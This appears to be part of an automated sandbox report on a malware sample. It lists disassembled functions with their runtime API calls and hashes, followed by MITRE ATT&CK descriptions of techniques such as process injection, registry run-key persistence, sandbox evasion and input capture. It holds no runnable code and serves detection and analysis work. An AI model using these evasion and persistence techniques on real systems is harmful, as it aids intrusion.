Source File: 00000002.00000002.482426794.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.482704528.00000000004F0000.00000040.00000001.sdmp Download File

Yara matches

Similarity

API ID: AddressOpenProcProcessVersion
String ID: GetProcessMemoryInfo$K32GetProcessMemoryInfo
API String ID: 1217584264-1962974740
Opcode ID: 049101f823ee28f1bb29dd5332a62457e83325362bb10e723031ba1e4a093d72
Instruction ID: fbd2607e2e50012dd5bd2a8f34f43baeaa0228b3dbb5db9b8667995970460b70
Opcode Fuzzy Hash: 049101f823ee28f1bb29dd5332a62457e83325362bb10e723031ba1e4a093d72
Instruction Fuzzy Hash: 9EF08630600204A6FB14BF769D46FAFB7E5AF04B55F100436B501A62D1EFA8DA01865D

Uniqueness

Uniqueness Score: -1.00%

Function 004B384E, Relevance: 6.3, APIs: 4, Instructions: 305COMMON

Download Yara Rule

APIs

_strrchr.LIBCMT ref: 004B38D9
__alldvrm.LIBCMT ref: 004B3ADA
__alldvrm.LIBCMT ref: 004B3AFC

Memory Dump Source

Source File: 00000002.00000002.482426794.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.482704528.00000000004F0000.00000040.00000001.sdmp Download File

Yara matches

Similarity

API ID: __alldvrm$_strrchr
String ID:
API String ID: 1036877536-0
Opcode ID: cf59a2465089a7603c647ea21e1a707a5df345a225b1c4ff3b1d698eb6aada1f
Instruction ID: aefbf502682c8a8259c916363cc8edfc7ad5277ee51f74c50151e1c402d83c2e
Opcode Fuzzy Hash: cf59a2465089a7603c647ea21e1a707a5df345a225b1c4ff3b1d698eb6aada1f
Instruction Fuzzy Hash: 88A15671A043869FEB21CF1AC8917EEBBE0EF15311F24416FE4959B382C63C9A41C769

Uniqueness

Uniqueness Score: -1.00%

Function 004A14C6, Relevance: 6.2, APIs: 4, Instructions: 168COMMON

Download Yara Rule

APIs

___AdjustPointer.LIBCMT ref: 004A158D
___AdjustPointer.LIBCMT ref: 004A15B0
___AdjustPointer.LIBCMT ref: 004A164C

Memory Dump Source

Source File: 00000002.00000001.219606461.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000001.220624239.00000000004F0000.00000040.00020000.sdmp Download File

Yara matches

Similarity

API ID: AdjustPointer
String ID:
API String ID: 1740715915-0
Opcode ID: f887c83835c5cb72f26c448c0f57ca06c8fd496e518150ae68044f1cab4e5553
Instruction ID: 3c0717075a898fdc87e0c65c008e7088a1d6a1ad2d33d74d011be9785ebaa25a
Opcode Fuzzy Hash: f887c83835c5cb72f26c448c0f57ca06c8fd496e518150ae68044f1cab4e5553
Instruction Fuzzy Hash: FA51F572A00202BFDB288F16C841B7A77A4EFA6714F14452FE907972B1E739EC41CB58

Uniqueness

Uniqueness Score: -1.00%

Function 004C2EC8, Relevance: 6.2, APIs: 4, Instructions: 152COMMON

Download Yara Rule

APIs

_free.LIBCMT ref: 004C2FF7

Memory Dump Source

Source File: 00000002.00000002.482426794.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.482704528.00000000004F0000.00000040.00000001.sdmp Download File

Yara matches

Similarity

API ID: _free
String ID:
API String ID: 269201875-0
Opcode ID: 2d261d4e3ccebd414b96874f67a147d9f8fd88ba039b85dbd140e8ebae50b590
Instruction ID: 944112402e0e41aecd2679c37f03b84fe737fc6ef94c1db62b5ce48790125d1e
Opcode Fuzzy Hash: 2d261d4e3ccebd414b96874f67a147d9f8fd88ba039b85dbd140e8ebae50b590
Instruction Fuzzy Hash: C84156356001086BDB656F7A8D41FAF3AB9EF12734F14022FF918C6291DAFC4D4162AE

Uniqueness

Uniqueness Score: -1.00%

Function 004B9AA8, Relevance: 6.1, APIs: 4, Instructions: 133COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.482426794.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.482704528.00000000004F0000.00000040.00000001.sdmp Download File

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 4fcfa19c15fc5a8cafe95093390a0d6dbe93a312acf91bbad6bb9d4421810fc6
Instruction ID: 2841f9bdff8b88ee4e3ddea9de328ee0ae5924222ae52d890bda5bb18cd83000
Opcode Fuzzy Hash: 4fcfa19c15fc5a8cafe95093390a0d6dbe93a312acf91bbad6bb9d4421810fc6
Instruction Fuzzy Hash: EE412671A04704AFD7259F38D841BAABBA9EB89314F10852FF201DB281D779BD118798

Uniqueness

Uniqueness Score: -1.00%

Function 004BAE04, Relevance: 6.1, APIs: 4, Instructions: 110COMMON

Download Yara Rule

APIs

MultiByteToWideChar.KERNEL32(?,00000000,?,?,00000000,00000000,004AD0C1,?,00000000,?,00000001,?,?,00000001,004AD0C1,00000000), ref: 004BAE51
MultiByteToWideChar.KERNEL32(?,00000001,?,?,00000000,?), ref: 004BAEDA
GetStringTypeW.KERNEL32(?,00000000,00000000,?,?,?,?,?,?,?,?,?,?,?,004AB16D,?), ref: 004BAEEC
__freea.LIBCMT ref: 004BAEF5

Part of subcall function 004B3009: RtlAllocateHeap.NTDLL(00000000,?,00000000,?,004BAEA8,00000000,?,004AB16D,?,00000008,?,004AD0C1,?,?,00000000), ref: 004B303B

Memory Dump Source

Source File: 00000002.00000002.482426794.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.482704528.00000000004F0000.00000040.00000001.sdmp Download File

Yara matches

Similarity

API ID: ByteCharMultiWide$AllocateHeapStringType__freea
String ID:
API String ID: 2652629310-0
Opcode ID: 37bc8d3c9671f5d36c50367f21a48d5722e3566d3ee6c20db020969a21b5d977
Instruction ID: a4fbd2dc5e2b7ab34be95624e795357535ce80dbf59413b932efc7bfd9841c50
Opcode Fuzzy Hash: 37bc8d3c9671f5d36c50367f21a48d5722e3566d3ee6c20db020969a21b5d977
Instruction Fuzzy Hash: 1831BC72A0020AABDF259F65DC85EEF7BA5EB40314B04012AFC14D7250EB39DDA4CBA5

Uniqueness

Uniqueness Score: -1.00%

Function 004B7633, Relevance: 6.1, APIs: 4, Instructions: 52libraryCOMMON

Download Yara Rule

APIs

LoadLibraryExW.KERNEL32(00000000,00000000,00000800,?,00000000,00000000,?,004B75DA,?,00000000,00000000,00000000,?,004B7906,00000006,FlsSetValue), ref: 004B7665
GetLastError.KERNEL32(?,004B75DA,?,00000000,00000000,00000000,?,004B7906,00000006,FlsSetValue,00407738,FlsSetValue,00000000,00000364,?,004B36ED), ref: 004B7671
LoadLibraryExW.KERNEL32(00000000,00000000,00000000,?,004B75DA,?,00000000,00000000,00000000,?,004B7906,00000006,FlsSetValue,00407738,FlsSetValue,00000000), ref: 004B767F

Memory Dump Source

Source File: 00000002.00000001.219606461.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000001.220624239.00000000004F0000.00000040.00020000.sdmp Download File

Yara matches

Similarity

API ID: LibraryLoad$ErrorLast
String ID:
API String ID: 3177248105-0
Opcode ID: 01fbe2b7ee0a610f66b6a863a4b8fc9118d8bfff3689b31a8e863defff608979
Instruction ID: eae1d2829f1d21e10f0659ceed50f2626ad4b4eee19bcbae86283e9f15c80e10
Opcode Fuzzy Hash: 01fbe2b7ee0a610f66b6a863a4b8fc9118d8bfff3689b31a8e863defff608979
Instruction Fuzzy Hash: 8501F73261A7279BC7214B6DAC44EA77B98AFC5770B210632F906E7241C728DC11C6FC

Uniqueness

Uniqueness Score: -1.00%

Function 0049D2A5, Relevance: 6.0, APIs: 4, Instructions: 25COMMON

Download Yara Rule

APIs

SleepConditionVariableCS.KERNELBASE(?,0049D242,00000064), ref: 0049D2C8
RtlLeaveCriticalSection.KERNEL32(004EDE9C,?,?,0049D242,00000064,?,?,004339A2,004EEB5C,00000000,00433DFD,00000004,00433B93,00000004,00434082,00000004), ref: 0049D2D2
WaitForSingleObjectEx.KERNEL32(?,00000000,?,0049D242,00000064,?,?,004339A2,004EEB5C,00000000,00433DFD,00000004,00433B93,00000004,00434082,00000004), ref: 0049D2E3
RtlEnterCriticalSection.KERNEL32(004EDE9C,?,0049D242,00000064,?,?,004339A2,004EEB5C,00000000,00433DFD,00000004,00433B93,00000004,00434082,00000004), ref: 0049D2EA

Memory Dump Source

Source File: 00000002.00000001.219606461.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000001.220624239.00000000004F0000.00000040.00020000.sdmp Download File

Yara matches

Similarity

API ID: CriticalSection$ConditionEnterLeaveObjectSingleSleepVariableWait
String ID:
API String ID: 3269011525-0
Opcode ID: d76baac3a06fc3c34612f881a3fa023dc78ba2c17244851ed166334f17987a0d
Instruction ID: 74ede8efc24935bfa6c6031723022cda5d35d32620753037d13f53a2ae0d91cc
Opcode Fuzzy Hash: d76baac3a06fc3c34612f881a3fa023dc78ba2c17244851ed166334f17987a0d
Instruction Fuzzy Hash: 1AE06D36942664BBCB112B59ED0DA9A3F28AB44711B0000B2B9095A12287665C108BDC

Uniqueness

Uniqueness Score: -1.00%

Function 00490B56, Relevance: 5.6, APIs: 2, Strings: 1, Instructions: 322COMMON

Download Yara Rule

APIs

__EH_prolog3_GS.LIBCMT ref: 00490B60

Part of subcall function 0048CD77: __EH_prolog3.LIBCMT ref: 0048CD7E
Part of subcall function 0048CD77: std::_Lockit::_Lockit.LIBCPMT ref: 0048CD88
Part of subcall function 0048CD77: std::_Lockit::~_Lockit.LIBCPMT ref: 0048CDF9

_Find_elem.LIBCPMT ref: 00490DAB

Strings

0123456789ABCDEFabcdef-+Xx, xrefs: 00490BD7

Memory Dump Source

Source File: 00000002.00000002.482426794.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.482704528.00000000004F0000.00000040.00000001.sdmp Download File

Yara matches

Similarity

API ID: Lockitstd::_$Find_elemH_prolog3H_prolog3_Lockit::_Lockit::~_
String ID: 0123456789ABCDEFabcdef-+Xx
API String ID: 2544715827-2799312399
Opcode ID: cabe3b0566db0db42ef53d4d012122222c7dd955ce98bae3f46502ae2c6f9f67
Instruction ID: 23fbfddedab11836c2148fbdb1d86ed87b44b514525450ac2377edd3fdd7f77d
Opcode Fuzzy Hash: cabe3b0566db0db42ef53d4d012122222c7dd955ce98bae3f46502ae2c6f9f67
Instruction Fuzzy Hash: 0AC1B371D042588EDF25DFA8C8847ADBFB2BF01304F5445ABD889AB282DB785D85CB58

Uniqueness

Uniqueness Score: -1.00%

Function 00490779, Relevance: 5.6, APIs: 2, Strings: 1, Instructions: 322COMMON

Download Yara Rule

APIs

__EH_prolog3_GS.LIBCMT ref: 00490783

Part of subcall function 0048CCE2: __EH_prolog3.LIBCMT ref: 0048CCE9
Part of subcall function 0048CCE2: std::_Lockit::_Lockit.LIBCPMT ref: 0048CCF3
Part of subcall function 0048CCE2: std::_Lockit::~_Lockit.LIBCPMT ref: 0048CD64

_Find_elem.LIBCPMT ref: 004909CE

Strings

0123456789ABCDEFabcdef-+Xx, xrefs: 004907FA

Memory Dump Source

Source File: 00000002.00000001.219606461.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000001.220624239.00000000004F0000.00000040.00020000.sdmp Download File

Yara matches

Similarity

API ID: Lockitstd::_$Find_elemH_prolog3H_prolog3_Lockit::_Lockit::~_
String ID: 0123456789ABCDEFabcdef-+Xx
API String ID: 2544715827-2799312399
Opcode ID: df411ee7188d3068d1a87059f1f1ceb1888137fd4abafb0738d41a87681804b6
Instruction ID: 490cfd8966008d8ea8aa2438db57e70df60011e500df6618bd9db9fa2d7fdad4
Opcode Fuzzy Hash: df411ee7188d3068d1a87059f1f1ceb1888137fd4abafb0738d41a87681804b6
Instruction Fuzzy Hash: 9FC19271D043588EDF21DF68C8817ADBFB2AF15314F5440ABE8896B283CB785D85CB58

Uniqueness

Uniqueness Score: -1.00%

Function 004AB9F9, Relevance: 5.5, APIs: 1, Strings: 2, Instructions: 266COMMON

Download Yara Rule

APIs

__aulldvrm.LIBCMT ref: 004ABB65

Strings

+, xrefs: 004ABAA2
-, xrefs: 004ABA95

Memory Dump Source

Source File: 00000002.00000002.482426794.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.482704528.00000000004F0000.00000040.00000001.sdmp Download File

Yara matches

Similarity

API ID: __aulldvrm
String ID: +$-
API String ID: 1302938615-2137968064
Opcode ID: 4936ace60c501eb2f0c09c68cc273ae92587ab98632c85dfafc505048b497c57
Instruction ID: 086ef9e352f1fed724d724a152477e71e79d26f93ced7bb71daff06cfc5af4c1
Opcode Fuzzy Hash: 4936ace60c501eb2f0c09c68cc273ae92587ab98632c85dfafc505048b497c57
Instruction Fuzzy Hash: 2C91DA30D041499FCF20CE69C8516EE7BB1EF67320F14865BE865A7396D73899028BA9

Uniqueness

Uniqueness Score: -1.00%

Function 004A9870, Relevance: 5.5, APIs: 2, Strings: 1, Instructions: 211COMMON

Download Yara Rule

Strings

pow, xrefs: 004A9975, 004A9992

Memory Dump Source

Source File: 00000002.00000002.482426794.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.482704528.00000000004F0000.00000040.00000001.sdmp Download File

Yara matches

Similarity

API ID:
String ID: pow
API String ID: 0-2276729525
Opcode ID: e3b1e1c3cd6f4b60d5be9649f80d1ce05694d544c85cab0d0d7f5a62eff31b6c
Instruction ID: a303c64bb138c9fad5e36fe1cedc22b9bcf782012a246fcbb59e43047fe4a953
Opcode Fuzzy Hash: e3b1e1c3cd6f4b60d5be9649f80d1ce05694d544c85cab0d0d7f5a62eff31b6c
Instruction Fuzzy Hash: 9F51BBB0908101A6DB15BB19CD413FB7BA4EB61700F21896FE4D5463E9EB3C8C95CA9F

Uniqueness

Uniqueness Score: -1.00%

Function 00485F68, Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 152COMMON

Download Yara Rule

APIs

__EH_prolog3_GS.LIBCMT ref: 00485F72

Strings

@, xrefs: 00485F87
@, xrefs: 00485F80

Memory Dump Source

Source File: 00000002.00000002.482426794.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.482704528.00000000004F0000.00000040.00000001.sdmp Download File

Yara matches

Similarity

API ID: H_prolog3_
String ID: @$@
API String ID: 2427045233-149943524
Opcode ID: f497cdc98d2597814a11adbe0b6bf863c4d88b471effe1825a61e47d33773506
Instruction ID: ee4fd81a2b6a048d9af4b6b00a21be7e2bd9f7bcd20dad400b400d5fc0af9497
Opcode Fuzzy Hash: f497cdc98d2597814a11adbe0b6bf863c4d88b471effe1825a61e47d33773506
Instruction Fuzzy Hash: 4E51B0B0C00708AACB10FFA6D989ACEFBB5BF15314F50465FE56563282DB385A45CF64

Uniqueness

Uniqueness Score: -1.00%

Function 004801A4, Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 147COMMON

Download Yara Rule

APIs

__EH_prolog3_GS.LIBCMT ref: 004801AB

Strings

@, xrefs: 004801B9
@, xrefs: 004801BD

Memory Dump Source

Source File: 00000002.00000001.219606461.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000001.220624239.00000000004F0000.00000040.00020000.sdmp Download File

Yara matches

Similarity

API ID: H_prolog3_
String ID: @$@
API String ID: 2427045233-149943524
Opcode ID: f89c1a31681aeaa22e63610e18eed1bedcddc3f34ed1c3266490f1e664b2c26c
Instruction ID: f92ed92c9db5bfd0f421601c8e4ac24b13c196cabc4d12cf62a06b024366651a
Opcode Fuzzy Hash: f89c1a31681aeaa22e63610e18eed1bedcddc3f34ed1c3266490f1e664b2c26c
Instruction Fuzzy Hash: E8517C70820318ABCF14FFA5CD86ADEBB78BF15314F50462EE455A7282DB785A08DF94

Uniqueness

Uniqueness Score: -1.00%

Function 0047FABB, Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 110COMMON

Download Yara Rule

APIs

__EH_prolog3_GS.LIBCMT ref: 0047FAC2

Strings

kG, xrefs: 0047FB1B, 0047FBB4
<kG, xrefs: 0047FB6A

Memory Dump Source

Source File: 00000002.00000002.482426794.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.482704528.00000000004F0000.00000040.00000001.sdmp Download File

Yara matches

Similarity

API ID: H_prolog3_
String ID: <kG$kG
API String ID: 2427045233-259690590
Opcode ID: 35802d53db0abf957d336c5c17d80e8e41b93bdd5be51d6d73c451daf7f3fb2a
Instruction ID: e1face48ce6cdafba67daf5fec9e86118ddb69b62f272237de733a74d6945970
Opcode Fuzzy Hash: 35802d53db0abf957d336c5c17d80e8e41b93bdd5be51d6d73c451daf7f3fb2a
Instruction Fuzzy Hash: 6341A671D10259ABCF04EFA5C891AEEBBB5BF05354F10812FE855B3241CB786A0DCB95

Uniqueness

Uniqueness Score: -1.00%

Function 00487213, Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 109COMMON

Download Yara Rule

APIs

__EH_prolog3_GS.LIBCMT ref: 0048721D

Strings

@, xrefs: 00487238
@, xrefs: 00487234

Memory Dump Source

Source File: 00000002.00000001.219606461.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000001.220624239.00000000004F0000.00000040.00020000.sdmp Download File

Yara matches

Similarity

API ID: H_prolog3_
String ID: @$@
API String ID: 2427045233-149943524
Opcode ID: 1910a22e70208366c72b4208d2332c2b94e8cfe59228e861259c6a05f42947c6
Instruction ID: d022816c5cc100a6ea101223940f1cf018e589ed328258847531d57c543562ea
Opcode Fuzzy Hash: 1910a22e70208366c72b4208d2332c2b94e8cfe59228e861259c6a05f42947c6
Instruction Fuzzy Hash: 044180B1C043099ACF14FFAAD991ADEBBB5BF14314F10456FE559A3281DB348A45CF24

Uniqueness

Uniqueness Score: -1.00%

Function 0048037D, Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 104COMMON

Download Yara Rule

APIs

__EH_prolog3_GS.LIBCMT ref: 00480384

Strings

@, xrefs: 00480395
@, xrefs: 00480399

Memory Dump Source

Source File: 00000002.00000001.219606461.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000001.220624239.00000000004F0000.00000040.00020000.sdmp Download File

Yara matches

Similarity

API ID: H_prolog3_
String ID: @$@
API String ID: 2427045233-149943524
Opcode ID: 0314bd074694b7ff17ae93b12c7526b73b36774af9141daac29b7e3bcaf25882
Instruction ID: 80e2c82255a6d97ff39b6a59cce6e6e0c63d7e1fca81ffd2a30c4d094d93ecbd
Opcode Fuzzy Hash: 0314bd074694b7ff17ae93b12c7526b73b36774af9141daac29b7e3bcaf25882
Instruction Fuzzy Hash: 41416071D103089EDF54FBB9C981ADEBBB4EF54304F10452FE559E3292EA385A08CB64

Uniqueness

Uniqueness Score: -1.00%

Function 00485AF6, Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 99COMMON

Download Yara Rule

APIs

__EH_prolog3_GS.LIBCMT ref: 00485AFD

Strings

@, xrefs: 00485BBB
@, xrefs: 00485B33

Memory Dump Source

Source File: 00000002.00000002.482426794.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.482704528.00000000004F0000.00000040.00000001.sdmp Download File

Yara matches

Similarity

API ID: H_prolog3_
String ID: @$@
API String ID: 2427045233-149943524
Opcode ID: 8cb567a4eac42cf0ba81e911690f9364293b2517a1a9b2b79b9f97d5a527cea5
Instruction ID: f96ae6994d6189260e198c5a55ae92dbca0fea0334840a30f258951f0b4eeb37
Opcode Fuzzy Hash: 8cb567a4eac42cf0ba81e911690f9364293b2517a1a9b2b79b9f97d5a527cea5
Instruction Fuzzy Hash: 253113B0900704AFDB14FFB8C9466AEBFB4AF11328F14475EE162A72C1D7785A06CB59

Uniqueness

Uniqueness Score: -1.00%

Function 0047F9A5, Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 89COMMON

Download Yara Rule

APIs

__EH_prolog3_GS.LIBCMT ref: 0047F9AC

Strings

@, xrefs: 0047F9DE
@, xrefs: 0047FA54

Memory Dump Source

Source File: 00000002.00000002.482426794.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.482704528.00000000004F0000.00000040.00000001.sdmp Download File

Yara matches

Similarity

API ID: H_prolog3_
String ID: @$@
API String ID: 2427045233-149943524
Opcode ID: 60969d8bf9d51a695d0f44a35701fa0d38b9d4e211375623c64418a13e6c58b8
Instruction ID: 39dfbee77f49447f130cd69d59a479f20feb56feef13357304bdd5504ee4f477
Opcode Fuzzy Hash: 60969d8bf9d51a695d0f44a35701fa0d38b9d4e211375623c64418a13e6c58b8
Instruction Fuzzy Hash: D831D8B19103089EDB10EFA4C946BEDBBB4AF11328F10825EE059B72C1D77C5E0ACB59

Uniqueness

Uniqueness Score: -1.00%

Function 004BE2BC, Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 88COMMON

Download Yara Rule

APIs

GetACP.KERNEL32(?,20001004,?,00000002,00000000,00000050,00000050,?,004BE517,?,00000050,?,?,?,?,?), ref: 004BE397

Strings

OCP, xrefs: 004BE310
ACP, xrefs: 004BE2DA

Memory Dump Source

Source File: 00000002.00000001.219606461.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000001.220624239.00000000004F0000.00000040.00020000.sdmp Download File

Yara matches

Similarity

API ID:
String ID: ACP$OCP
API String ID: 0-711371036
Opcode ID: 253846065960f33882bf969ffcad9d8d772902348df2a2fffcfc95d5830fd043
Instruction ID: a89b859e120f9be22b54d0ec46c22c86f97a2a89b299cce6d186440b378b848f
Opcode Fuzzy Hash: 253846065960f33882bf969ffcad9d8d772902348df2a2fffcfc95d5830fd043
Instruction Fuzzy Hash: 4521C462A04200A6D7349A66C905BEB73E6ABE0B50F565466ED0AD7300E73ADD00C3BC

Uniqueness

Uniqueness Score: -1.00%

Function 004BA58D, Relevance: 5.1, APIs: 4, Instructions: 139COMMON

Download Yara Rule

APIs

MultiByteToWideChar.KERNEL32(?,00000009,00000000,00000000,?,00000000,00000000,00000000,00000000,?,?,00000000,00000000,00000000,?), ref: 004BA623
GetLastError.KERNEL32 ref: 004BA631
MultiByteToWideChar.KERNEL32(?,00000001,?,?,?,00000000), ref: 004BA68C

Memory Dump Source

Source File: 00000002.00000001.219606461.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000001.220624239.00000000004F0000.00000040.00020000.sdmp Download File

Yara matches

Similarity

API ID: ByteCharMultiWide$ErrorLast
String ID:
API String ID: 1717984340-0
Opcode ID: 621a7f32ed17431b53dac75ca64d75c366f2d219f569858c10d8f5381de39927
Instruction ID: 1a1548d7695399cc7beec9952a84a5458b0c44cd983eeecfe80b3a2427f09990
Opcode Fuzzy Hash: 621a7f32ed17431b53dac75ca64d75c366f2d219f569858c10d8f5381de39927
Instruction Fuzzy Hash: 3541E670600205EFCB258F65C844BFF7BA4AF51310F18416BF999972A1EB348D21CB7A

Uniqueness

Uniqueness Score: -1.00%

Description:	Adversaries may abuse Windows Management Instrumentation (WMI) to achieve execution. WMI is a Windows administration feature that provides a uniform environment for local and remote access to Windows system components. It relies on the WMI service for local and remote access and the server message block (SMB) and Remote Procedure Call Service (RPCS) for remote access. RPCS operates over port 135.
Tactics:	Execution
Data Sources:	Authentication logs, Netflow/Enclave netflow, Process command-line parameters, Process monitoring
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may abuse command and script interpreters to execute commands, scripts, or binaries. These interfaces and languages provide ways of interacting with computer systems and are a common feature across many different platforms. Most systems come with some built-in command-line interface and scripting capabilities, for example, macOS and Linux distributions include some flavor of Unix Shell while Windows installations include the Windows Command Shell and PowerShell .
Tactics:	Execution
Data Sources:	PowerShell logs, Process command-line parameters, Process monitoring, Windows event logs
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may directly interact with the native OS application programming interface (API) to execute behaviors. Native APIs provide a controlled means of calling low-level OS services within the kernel, such as those involving hardware/devices, memory, and processes.These native APIs are leveraged by the OS during system boot (when other system components are not yet initialized) as well as carrying out tasks and requests during routine operations.
Tactics:	Execution
Data Sources:	API monitoring, Loaded DLLs, Process monitoring, System calls
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may achieve persistence by adding a program to a startup folder or referencing it with a Registry run key. Adding an entry to the "run keys" in the Registry or startup folder will cause the program referenced to be executed when a user logs in. These programs will be executed under the context of the user and will have the account's associated permissions level.
Tactics:	Persistence, Privilege Escalation
Data Sources:	File monitoring, Windows Registry
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may modify access tokens to operate under a different user or system security context to perform actions and bypass access controls. Windows uses access tokens to determine the ownership of a running process. A user can manipulate access tokens to make a running process appear as though it is the child of a different process or belongs to someone other than the user that started the process. When this occurs, the process also takes on the security context associated with the new token.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	API monitoring, Access tokens, Authentication logs, Process command-line parameters, Process monitoring, Windows event logs
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may inject code into processes in order to evade process-based defenses as well as possibly elevate privileges. Process injection is a method of executing arbitrary code in the address space of a separate live process. Running code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via process injection may also evade detection from security products since the execution is masked under a legitimate process.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	API monitoring, DLL monitoring, File monitoring, Named Pipes, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to manipulate features of their artifacts to make them appear legitimate or benign to users and/or security tools. Masquerading occurs when the name or location of an object, legitimate or malicious, is manipulated or abused for the sake of evading defenses and observation. This may include manipulating file metadata, tricking users into misidentifying the file type, and giving legitimate task or service names.
Tactics:	Defense Evasion
Data Sources:	Binary file metadata, File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ various means to detect and avoid virtualization and analysis environments. This may include changing behaviors based on the results of checks for the presence of artifacts indicative of a virtual machine environment (VME) or sandbox. If the adversary detects a VME, they may alter their malware to disengage from the victim or conceal the core functions of the implant. They may also search for VME artifacts before dropping secondary or additional payloads. Adversaries may use the information learned from [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497) during automated discovery to shape follow-on behaviors.
Tactics:	Defense Evasion, Discovery
Data Sources:	Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may disable security tools to avoid possible detection of their tools and activities. This can take the form of killing security software or event logging processes, deleting Registry keys so that tools do not start at run time, or other methods to interfere with security tools scanning or reporting information.
Tactics:	Defense Evasion
Data Sources:	File monitoring, Process command-line parameters, Services, Windows Registry
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use Obfuscated Files or Information to hide artifacts of an intrusion from analysis. They may require separate mechanisms to decode or deobfuscate that information depending on how they intend to use it. Methods for doing that include built-in functionality of malware or by using utilities present on the system.
Tactics:	Defense Evasion
Data Sources:	File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to make an executable or file difficult to discover or analyze by encrypting, encoding, or otherwise obfuscating its contents on the system or in transit. This is common behavior that can be used across different platforms and the network to evade defenses.
Tactics:	Defense Evasion
Data Sources:	Binary file metadata, Email gateway, Environment variable, File monitoring, Malware reverse engineering, Network intrusion detection system, Network protocol analysis, Process command-line parameters, Process monitoring, Process use of network, SSL/TLS inspection, Windows event logs
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may perform software packing or virtual machine software protection to conceal their code. Software packing is a method of compressing or encrypting an executable. Packing an executable changes the file signature in an attempt to avoid signature-based detection. Most decompression techniques decompress the executable code in memory. Virtual machine software protection translates an executable's original code into a special format that only a special virtual machine can run. A virtual machine is then called to run this code.
Tactics:	Defense Evasion
Data Sources:	Binary file metadata
Platforms:	macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use methods of capturing user input to obtain credentials or collect information. During normal system usage, users often provide credentials to various different locations, such as login pages/portals or system dialog boxes. Input capture mechanisms may be transparent to the user (e.g. Credential API Hooking ) or rely on deceiving the user into providing input into what they believe to be a genuine service (e.g. Web Portal Capture ).
Tactics:	Collection, Credential Access
Data Sources:	API monitoring, Binary file metadata, DLL monitoring, Kernel drivers, Loaded DLLs, PowerShell logs, Process command-line parameters, Process monitoring, User interface, Windows Registry, Windows event logs
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may gather the system time and/or time zone from a local or remote system. The system time is set and stored by the Windows Time Service within a domain to maintain time synchronization between systems and services in an enterprise network.
Tactics:	Discovery
Data Sources:	API monitoring, Process command-line parameters, Process monitoring
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may interact with the Windows Registry to gather information about the system, configuration, and installed software.
Tactics:	Discovery
Data Sources:	Process command-line parameters, Process monitoring, Windows Registry
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get a listing of security software, configurations, defensive tools, and sensors that are installed on a system or in a cloud environment. This may include things such as firewall rules and anti-virus. Adversaries may use the information from Security Software Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	AWS CloudTrail logs, Azure activity logs, File monitoring, Process command-line parameters, Process monitoring, Stackdriver logs
